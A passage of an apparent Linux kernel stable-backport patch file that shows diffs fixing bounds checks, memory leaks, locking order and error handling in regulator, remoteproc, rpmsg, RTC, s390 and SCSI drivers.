++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -135,8 +140,10 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ static unsigned max77802_get_mode(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	return max77802_map_mode(max77802->opmode[id]);
+ }
+ 
+@@ -160,10 +167,13 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ 				     unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the regulator has been disabled for suspend
+ 	 * then is invalid to try setting a suspend mode.
+@@ -209,9 +219,11 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ static int max77802_enable(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	if (max77802->opmode[id] == MAX77802_OFF_PWRREQ)
+ 		max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+ 
+@@ -495,7 +507,7 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < MAX77802_REG_MAX; i++) {
+ 		struct regulator_dev *rdev;
+-		int id = regulators[i].id;
++		unsigned int id = regulators[i].id;
+ 		int shift = max77802_get_opmode_shift(id);
+ 		int ret;
+ 
+@@ -513,10 +525,12 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 		 * the hardware reports OFF as the regulator operating mode.
+ 		 * Default to operating mode NORMAL in that case.
+ 		 */
+-		if (val == MAX77802_STATUS_OFF)
+-			max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+-		else
+-			max77802->opmode[id] = val;
++		if (id < ARRAY_SIZE(max77802->opmode)) {
++			if (val == MAX77802_STATUS_OFF)
++				max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
++			else
++				max77802->opmode[id] = val;
++		}
+ 
+ 		rdev = devm_regulator_register(&pdev->dev,
+ 					       &regulators[i], &config);
+diff --git a/drivers/regulator/s5m8767.c b/drivers/regulator/s5m8767.c
+index 35269f9982105..754c6fcc6e642 100644
+--- a/drivers/regulator/s5m8767.c
++++ b/drivers/regulator/s5m8767.c
+@@ -923,10 +923,14 @@ static int s5m8767_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < pdata->num_regulators; i++) {
+ 		const struct sec_voltage_desc *desc;
+-		int id = pdata->regulators[i].id;
++		unsigned int id = pdata->regulators[i].id;
+ 		int enable_reg, enable_val;
+ 		struct regulator_dev *rdev;
+ 
++		BUILD_BUG_ON(ARRAY_SIZE(regulators) != ARRAY_SIZE(reg_voltage_map));
++		if (WARN_ON_ONCE(id >= ARRAY_SIZE(regulators)))
++			continue;
++
+ 		desc = reg_voltage_map[id];
+ 		if (desc) {
+ 			regulators[id].n_voltages =
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index c484c943e4675..58f6541b6417b 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -173,24 +173,6 @@ static unsigned int tps65219_get_mode(struct regulator_dev *dev)
+ 		return REGULATOR_MODE_NORMAL;
+ }
+ 
+-/*
+- * generic regulator_set_bypass_regmap does not fully match requirements
+- * TPS65219 Requires explicitly that regulator is disabled before switch
+- */
+-static int tps65219_set_bypass(struct regulator_dev *dev, bool enable)
+-{
+-	struct tps65219 *tps = rdev_get_drvdata(dev);
+-	unsigned int rid = rdev_get_id(dev);
+-
+-	if (dev->desc->ops->is_enabled(dev)) {
+-		dev_err(tps->dev,
+-			"%s LDO%d enabled, must be shut down to set bypass ",
+-			__func__, rid);
+-		return -EBUSY;
+-	}
+-	return regulator_set_bypass_regmap(dev, enable);
+-}
+-
+ /* Operations permitted on BUCK1/2/3 */
+ static const struct regulator_ops tps65219_bucks_ops = {
+ 	.is_enabled		= regulator_is_enabled_regmap,
+@@ -217,7 +199,7 @@ static const struct regulator_ops tps65219_ldos_1_2_ops = {
+ 	.set_voltage_sel	= regulator_set_voltage_sel_regmap,
+ 	.list_voltage		= regulator_list_voltage_linear_range,
+ 	.map_voltage		= regulator_map_voltage_linear_range,
+-	.set_bypass		= tps65219_set_bypass,
++	.set_bypass		= regulator_set_bypass_regmap,
+ 	.get_bypass		= regulator_get_bypass_regmap,
+ };
+ 
+@@ -367,7 +349,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].type = irq_type;
+ 
+ 		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
+-		if (rdev < 0) {
++		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
+ 			return -EINVAL;
+diff --git a/drivers/remoteproc/mtk_scp_ipi.c b/drivers/remoteproc/mtk_scp_ipi.c
+index 00f041ebcde63..4c0d121c2f54d 100644
+--- a/drivers/remoteproc/mtk_scp_ipi.c
++++ b/drivers/remoteproc/mtk_scp_ipi.c
+@@ -164,21 +164,21 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 	    WARN_ON(len > sizeof(send_obj->share_buf)) || WARN_ON(!buf))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&scp->send_lock);
+-
+ 	ret = clk_prepare_enable(scp->clk);
+ 	if (ret) {
+ 		dev_err(scp->dev, "failed to enable clock\n");
+-		goto unlock_mutex;
++		return ret;
+ 	}
+ 
++	mutex_lock(&scp->send_lock);
++
+ 	 /* Wait until SCP receives the last command */
+ 	timeout = jiffies + msecs_to_jiffies(2000);
+ 	do {
+ 		if (time_after(jiffies, timeout)) {
+ 			dev_err(scp->dev, "%s: IPI timeout!\n", __func__);
+ 			ret = -ETIMEDOUT;
+-			goto clock_disable;
++			goto unlock_mutex;
+ 		}
+ 	} while (readl(scp->reg_base + scp->data->host_to_scp_reg));
+ 
+@@ -205,10 +205,9 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 			ret = 0;
+ 	}
+ 
+-clock_disable:
+-	clk_disable_unprepare(scp->clk);
+ unlock_mutex:
+ 	mutex_unlock(&scp->send_lock);
++	clk_disable_unprepare(scp->clk);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/remoteproc/qcom_q6v5_mss.c b/drivers/remoteproc/qcom_q6v5_mss.c
+index fddb63cffee07..7dbab5fcbe1e7 100644
+--- a/drivers/remoteproc/qcom_q6v5_mss.c
++++ b/drivers/remoteproc/qcom_q6v5_mss.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/devcoredump.h>
+-#include <linux/dma-map-ops.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/kernel.h>
+@@ -18,6 +17,7 @@
+ #include <linux/module.h>
+ #include <linux/of_address.h>
+ #include <linux/of_device.h>
++#include <linux/of_reserved_mem.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_runtime.h>
+@@ -211,6 +211,9 @@ struct q6v5 {
+ 	size_t mba_size;
+ 	size_t dp_size;
+ 
++	phys_addr_t mdata_phys;
++	size_t mdata_size;
++
+ 	phys_addr_t mpss_phys;
+ 	phys_addr_t mpss_reloc;
+ 	size_t mpss_size;
+@@ -933,52 +936,47 @@ static void q6v5proc_halt_axi_port(struct q6v5 *qproc,
+ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 				const char *fw_name)
+ {
+-	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS | DMA_ATTR_NO_KERNEL_MAPPING;
+-	unsigned long flags = VM_DMA_COHERENT | VM_FLUSH_RESET_PERMS;
+-	struct page **pages;
+-	struct page *page;
++	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS;
+ 	dma_addr_t phys;
+ 	void *metadata;
+ 	int mdata_perm;
+ 	int xferop_ret;
+ 	size_t size;
+-	void *vaddr;
+-	int count;
++	void *ptr;
+ 	int ret;
+-	int i;
+ 
+ 	metadata = qcom_mdt_read_metadata(fw, &size, fw_name, qproc->dev);
+ 	if (IS_ERR(metadata))
+ 		return PTR_ERR(metadata);
+ 
+-	page = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
+-	if (!page) {
+-		kfree(metadata);
+-		dev_err(qproc->dev, "failed to allocate mdt buffer\n");
+-		return -ENOMEM;
+-	}
+-
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		ret = -ENOMEM;
+-		goto free_dma_attrs;
+-	}
+-
+-	for (i = 0; i < count; i++)
+-		pages[i] = nth_page(page, i);
++	if (qproc->mdata_phys) {
++		if (size > qproc->mdata_size) {
++			ret = -EINVAL;
++			dev_err(qproc->dev, "metadata size outside memory range\n");
++			goto free_metadata;
++		}
+ 
+-	vaddr = vmap(pages, count, flags, pgprot_dmacoherent(PAGE_KERNEL));
+-	kfree(pages);
+-	if (!vaddr) {
+-		dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n", &phys, size);
+-		ret = -EBUSY;
+-		goto free_dma_attrs;
++		phys = qproc->mdata_phys;
++		ptr = memremap(qproc->mdata_phys, size, MEMREMAP_WC);
++		if (!ptr) {
++			ret = -EBUSY;
++			dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n",
++				&qproc->mdata_phys, size);
++			goto free_metadata;
++		}
++	} else {
++		ptr = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
++		if (!ptr) {
++			ret = -ENOMEM;
++			dev_err(qproc->dev, "failed to allocate mdt buffer\n");
++			goto free_metadata;
++		}
+ 	}
+ 
+-	memcpy(vaddr, metadata, size);
++	memcpy(ptr, metadata, size);
+ 
+-	vunmap(vaddr);
++	if (qproc->mdata_phys)
++		memunmap(ptr);
+ 
+ 	/* Hypervisor mapping to access metadata by modem */
+ 	mdata_perm = BIT(QCOM_SCM_VMID_HLOS);
+@@ -1008,7 +1006,9 @@ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 			 "mdt buffer not reclaimed system may become unstable\n");
+ 
+ free_dma_attrs:
+-	dma_free_attrs(qproc->dev, size, page, phys, dma_attrs);
++	if (!qproc->mdata_phys)
++		dma_free_attrs(qproc->dev, size, ptr, phys, dma_attrs);
++free_metadata:
+ 	kfree(metadata);
+ 
+ 	return ret < 0 ? ret : 0;
+@@ -1836,6 +1836,7 @@ static int q6v5_init_reset(struct q6v5 *qproc)
+ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ {
+ 	struct device_node *child;
++	struct reserved_mem *rmem;
+ 	struct device_node *node;
+ 	struct resource r;
+ 	int ret;
+@@ -1882,6 +1883,26 @@ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ 	qproc->mpss_phys = qproc->mpss_reloc = r.start;
+ 	qproc->mpss_size = resource_size(&r);
+ 
++	if (!child) {
++		node = of_parse_phandle(qproc->dev->of_node, "memory-region", 2);
++	} else {
++		child = of_get_child_by_name(qproc->dev->of_node, "metadata");
++		node = of_parse_phandle(child, "memory-region", 0);
++		of_node_put(child);
++	}
++
++	if (!node)
++		return 0;
++
++	rmem = of_reserved_mem_lookup(node);
++	if (!rmem) {
++		dev_err(qproc->dev, "unable to resolve metadata region\n");
++		return -EINVAL;
++	}
++
++	qproc->mdata_phys = rmem->base;
++	qproc->mdata_size = rmem->size;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 115c0a1eddb10..35df1b0a515bf 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -954,6 +954,7 @@ static void qcom_glink_handle_intent(struct qcom_glink *glink,
+ 	spin_unlock_irqrestore(&glink->idr_lock, flags);
+ 	if (!channel) {
+ 		dev_err(glink->dev, "intents for non-existing channel\n");
++		qcom_glink_rx_advance(glink, ALIGN(msglen, 8));
+ 		return;
+ 	}
+ 
+@@ -1446,6 +1447,7 @@ static void qcom_glink_rpdev_release(struct device *dev)
+ {
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+@@ -1689,6 +1691,7 @@ static void qcom_glink_device_release(struct device *dev)
+ 
+ 	/* Release qcom_glink_alloc_channel() reference */
+ 	kref_put(&channel->refcount, qcom_glink_channel_release);
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+diff --git a/drivers/rtc/rtc-pm8xxx.c b/drivers/rtc/rtc-pm8xxx.c
+index 716e5d9ad74d1..d114f0da537d2 100644
+--- a/drivers/rtc/rtc-pm8xxx.c
++++ b/drivers/rtc/rtc-pm8xxx.c
+@@ -221,7 +221,6 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ {
+ 	int rc, i;
+ 	u8 value[NUM_8_BIT_RTC_REGS];
+-	unsigned int ctrl_reg;
+ 	unsigned long secs, irq_flags;
+ 	struct pm8xxx_rtc *rtc_dd = dev_get_drvdata(dev);
+ 	const struct pm8xxx_rtc_regs *regs = rtc_dd->regs;
+@@ -233,6 +232,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		secs >>= 8;
+ 	}
+ 
++	rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++				regs->alarm_en, 0);
++	if (rc)
++		return rc;
++
+ 	spin_lock_irqsave(&rtc_dd->ctrl_reg_lock, irq_flags);
+ 
+ 	rc = regmap_bulk_write(rtc_dd->regmap, regs->alarm_rw, value,
+@@ -242,19 +246,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		goto rtc_rw_fail;
+ 	}
+ 
+-	rc = regmap_read(rtc_dd->regmap, regs->alarm_ctrl, &ctrl_reg);
+-	if (rc)
+-		goto rtc_rw_fail;
+-
+-	if (alarm->enabled)
+-		ctrl_reg |= regs->alarm_en;
+-	else
+-		ctrl_reg &= ~regs->alarm_en;
+-
+-	rc = regmap_write(rtc_dd->regmap, regs->alarm_ctrl, ctrl_reg);
+-	if (rc) {
+-		dev_err(dev, "Write to RTC alarm control register failed\n");
+-		goto rtc_rw_fail;
++	if (alarm->enabled) {
++		rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++					regs->alarm_en, regs->alarm_en);
++		if (rc)
++			goto rtc_rw_fail;
+ 	}
+ 
+ 	dev_dbg(dev, "Alarm Set for h:m:s=%ptRt, y-m-d=%ptRdr\n",
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 5d0b9991e91a4..b20ce86b97b29 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -6956,8 +6956,10 @@ dasd_eckd_init(void)
+ 		return -ENOMEM;
+ 	dasd_vol_info_req = kmalloc(sizeof(*dasd_vol_info_req),
+ 				    GFP_KERNEL | GFP_DMA);
+-	if (!dasd_vol_info_req)
++	if (!dasd_vol_info_req) {
++		kfree(dasd_reserve_req);
+ 		return -ENOMEM;
++	}
+ 	pe_handler_worker = kmalloc(sizeof(*pe_handler_worker),
+ 				    GFP_KERNEL | GFP_DMA);
+ 	if (!pe_handler_worker) {
+diff --git a/drivers/s390/char/sclp_early.c b/drivers/s390/char/sclp_early.c
+index c1c70a161c0e2..f480d6c7fd399 100644
+--- a/drivers/s390/char/sclp_early.c
++++ b/drivers/s390/char/sclp_early.c
+@@ -163,7 +163,7 @@ static void __init sclp_early_console_detect(struct init_sccb *sccb)
+ 		sclp.has_linemode = 1;
+ }
+ 
+-void __init sclp_early_adjust_va(void)
++void __init __no_sanitize_address sclp_early_adjust_va(void)
+ {
+ 	sclp_early_sccb = __va((unsigned long)sclp_early_sccb);
+ }
+diff --git a/drivers/s390/cio/vfio_ccw_drv.c b/drivers/s390/cio/vfio_ccw_drv.c
+index 54aba7cceb33f..ff538a086fc77 100644
+--- a/drivers/s390/cio/vfio_ccw_drv.c
++++ b/drivers/s390/cio/vfio_ccw_drv.c
+@@ -225,7 +225,7 @@ static void vfio_ccw_sch_shutdown(struct subchannel *sch)
+ 	struct vfio_ccw_parent *parent = dev_get_drvdata(&sch->dev);
+ 	struct vfio_ccw_private *private = dev_get_drvdata(&parent->dev);
+ 
+-	if (WARN_ON(!private))
++	if (!private)
+ 		return;
+ 
+ 	vfio_ccw_fsm_event(private, VFIO_CCW_EVENT_CLOSE);
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 9c01957e56b3f..2bba5ed83dfcf 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -349,6 +349,8 @@ static int vfio_ap_validate_nib(struct kvm_vcpu *vcpu, dma_addr_t *nib)
+ {
+ 	*nib = vcpu->run->s.regs.gprs[2];
+ 
++	if (!*nib)
++		return -EINVAL;
+ 	if (kvm_is_error_hva(gfn_to_hva(vcpu->kvm, *nib >> PAGE_SHIFT)))
+ 		return -EINVAL;
+ 
+@@ -1857,8 +1859,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 		return ret;
+ 
+ 	q = kzalloc(sizeof(*q), GFP_KERNEL);
+-	if (!q)
+-		return -ENOMEM;
++	if (!q) {
++		ret = -ENOMEM;
++		goto err_remove_group;
++	}
+ 
+ 	q->apqn = to_ap_queue(&apdev->device)->qid;
+ 	q->saved_isc = VFIO_AP_ISC_INVALID;
+@@ -1876,6 +1880,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+ 	return 0;
++
++err_remove_group:
++	sysfs_remove_group(&apdev->device.kobj, &vfio_queue_attr_group);
++	return ret;
+ }
+ 
+ void vfio_ap_mdev_remove_queue(struct ap_device *apdev)
+diff --git a/drivers/scsi/aacraid/aachba.c b/drivers/scsi/aacraid/aachba.c
+index 4d4cb47b38467..24c049eff157a 100644
+--- a/drivers/scsi/aacraid/aachba.c
++++ b/drivers/scsi/aacraid/aachba.c
+@@ -818,8 +818,8 @@ static void aac_probe_container_scsi_done(struct scsi_cmnd *scsi_cmnd)
+ 
+ int aac_probe_container(struct aac_dev *dev, int cid)
+ {
+-	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd), GFP_KERNEL);
+-	struct aac_cmd_priv *cmd_priv = aac_priv(scsicmd);
++	struct aac_cmd_priv *cmd_priv;
++	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd) + sizeof(*cmd_priv), GFP_KERNEL);
+ 	struct scsi_device *scsidev = kzalloc(sizeof(*scsidev), GFP_KERNEL);
+ 	int status;
+ 
+@@ -838,6 +838,7 @@ int aac_probe_container(struct aac_dev *dev, int cid)
+ 		while (scsicmd->device == scsidev)
+ 			schedule();
+ 	kfree(scsidev);
++	cmd_priv = aac_priv(scsicmd);
+ 	status = cmd_priv->status;
+ 	kfree(scsicmd);
+ 	return status;
+diff --git a/drivers/scsi/aic94xx/aic94xx_task.c b/drivers/scsi/aic94xx/aic94xx_task.c
+index ed119a3f6f2ed..7f02083001100 100644
+--- a/drivers/scsi/aic94xx/aic94xx_task.c
++++ b/drivers/scsi/aic94xx/aic94xx_task.c
+@@ -50,6 +50,9 @@ static int asd_map_scatterlist(struct sas_task *task,
+ 		dma_addr_t dma = dma_map_single(&asd_ha->pcidev->dev, p,
+ 						task->total_xfer_len,
+ 						task->data_dir);
++		if (dma_mapping_error(&asd_ha->pcidev->dev, dma))
++			return -ENOMEM;
++
+ 		sg_arr[0].bus_addr = cpu_to_le64((u64)dma);
+ 		sg_arr[0].size = cpu_to_le32(task->total_xfer_len);
+ 		sg_arr[0].flags |= ASD_SG_EL_LIST_EOL;
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 182aaae603868..55a0d4013439f 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -20819,6 +20819,7 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	struct lpfc_mbx_wr_object *wr_object;
+ 	LPFC_MBOXQ_t *mbox;
+ 	int rc = 0, i = 0;
++	int mbox_status = 0;
+ 	uint32_t shdr_status, shdr_add_status, shdr_add_status_2;
+ 	uint32_t shdr_change_status = 0, shdr_csf = 0;
+ 	uint32_t mbox_tmo;
+@@ -20864,11 +20865,15 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	wr_object->u.request.bde_count = i;
+ 	bf_set(lpfc_wr_object_write_length, &wr_object->u.request, written);
+ 	if (!phba->sli4_hba.intr_enable)
+-		rc = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
++		mbox_status = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
+ 	else {
+ 		mbox_tmo = lpfc_mbox_tmo_val(phba, mbox);
+-		rc = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
++		mbox_status = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
+ 	}
++
++	/* The mbox status needs to be maintained to detect MBOX_TIMEOUT. */
++	rc = mbox_status;
++
+ 	/* The IOCTL status is embedded in the mailbox subheader. */
+ 	shdr_status = bf_get(lpfc_mbox_hdr_status,
+ 			     &wr_object->header.cfg_shdr.response);
+@@ -20883,10 +20888,6 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 				  &wr_object->u.response);
+ 	}
+ 
+-	if (!phba->sli4_hba.intr_enable)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+-	else if (rc != MBX_TIMEOUT)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+ 	if (shdr_status || shdr_add_status || shdr_add_status_2 || rc) {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+ 				"3025 Write Object mailbox failed with "
+@@ -20904,6 +20905,12 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 		lpfc_log_fw_write_cmpl(phba, shdr_status, shdr_add_status,
+ 				       shdr_add_status_2, shdr_change_status,
+ 				       shdr_csf);
++
++	if (!phba->sli4_hba.intr_enable)
++		mempool_free(mbox, phba->mbox_mem_pool);
++	else if (mbox_status != MBX_TIMEOUT)
++		mempool_free(mbox, phba->mbox_mem_pool);
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 9baac224b2135..bff6377023979 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -293,7 +293,6 @@ out:
+ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	struct bsg_job *job)
+ {
+-	long rval = -EINVAL;
+ 	u16 num_devices = 0, i = 0, size;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev;
+@@ -304,7 +303,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	if (job->request_payload.payload_len < sizeof(u32)) {
+ 		dprint_bsg_err(mrioc, "%s: invalid size argument\n",
+ 		    __func__);
+-		return rval;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+@@ -312,7 +311,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		num_devices++;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	if ((job->request_payload.payload_len == sizeof(u32)) ||
++	if ((job->request_payload.payload_len <= sizeof(u64)) ||
+ 		list_empty(&mrioc->tgtdev_list)) {
+ 		sg_copy_from_buffer(job->request_payload.sg_list,
+ 				    job->request_payload.sg_cnt,
+@@ -320,14 +319,14 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		return 0;
+ 	}
+ 
+-	kern_entrylen = (num_devices - 1) * sizeof(*devmap_info);
+-	size = sizeof(*alltgt_info) + kern_entrylen;
++	kern_entrylen = num_devices * sizeof(*devmap_info);
++	size = sizeof(u64) + kern_entrylen;
+ 	alltgt_info = kzalloc(size, GFP_KERNEL);
+ 	if (!alltgt_info)
+ 		return -ENOMEM;
+ 
+ 	devmap_info = alltgt_info->dmi;
+-	memset((u8 *)devmap_info, 0xFF, (kern_entrylen + sizeof(*devmap_info)));
++	memset((u8 *)devmap_info, 0xFF, kern_entrylen);
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if (i < num_devices) {
+@@ -344,25 +343,18 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	num_devices = i;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	memcpy(&alltgt_info->num_devices, &num_devices, sizeof(num_devices));
++	alltgt_info->num_devices = num_devices;
+ 
+-	usr_entrylen = (job->request_payload.payload_len - sizeof(u32)) / sizeof(*devmap_info);
++	usr_entrylen = (job->request_payload.payload_len - sizeof(u64)) /
++		sizeof(*devmap_info);
+ 	usr_entrylen *= sizeof(*devmap_info);
+ 	min_entrylen = min(usr_entrylen, kern_entrylen);
+-	if (min_entrylen && (!memcpy(&alltgt_info->dmi, devmap_info, min_entrylen))) {
+-		dprint_bsg_err(mrioc, "%s:%d: device map info copy failed\n",
+-		    __func__, __LINE__);
+-		rval = -EFAULT;
+-		goto out;
+-	}
+ 
+ 	sg_copy_from_buffer(job->request_payload.sg_list,
+ 			    job->request_payload.sg_cnt,
+-			    alltgt_info, job->request_payload.payload_len);
+-	rval = 0;
+-out:
++			    alltgt_info, (min_entrylen + sizeof(u64)));
+ 	kfree(alltgt_info);
+-	return rval;
++	return 0;
+ }
+ /**
+  * mpi3mr_get_change_count - Get topology change count
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 3306de7170f64..6eaeba41072cb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4952,6 +4952,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->dev_rmhs_cmds[i],
+ 		    MPI3MR_HOSTTAG_DEVRMCMD_MIN + i);
+ 
++	for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
++		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
++				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
++
+ 	if (pdev->revision)
+ 		mrioc->enable_segqueue = true;
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 69061545d9d2f..2ee9ea57554d7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -5849,6 +5849,9 @@ _base_release_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 		}
+ 		dma_pool_destroy(ioc->pcie_sgl_dma_pool);
+ 	}
++	kfree(ioc->pcie_sg_lookup);
++	ioc->pcie_sg_lookup = NULL;
++
+ 	if (ioc->config_page) {
+ 		dexitprintk(ioc,
+ 			    ioc_info(ioc, "config_page(0x%p): free\n",
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index cd75b179410d7..dba7bba788d76 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -278,8 +278,8 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 	const char *type;
+ 	int req_sg_cnt, rsp_sg_cnt;
+ 	int rval =  (DID_ERROR << 16);
+-	uint16_t nextlid = 0;
+ 	uint32_t els_cmd = 0;
++	int qla_port_allocated = 0;
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
+@@ -329,9 +329,9 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		/* make sure the rport is logged in,
+ 		 * if not perform fabric login
+ 		 */
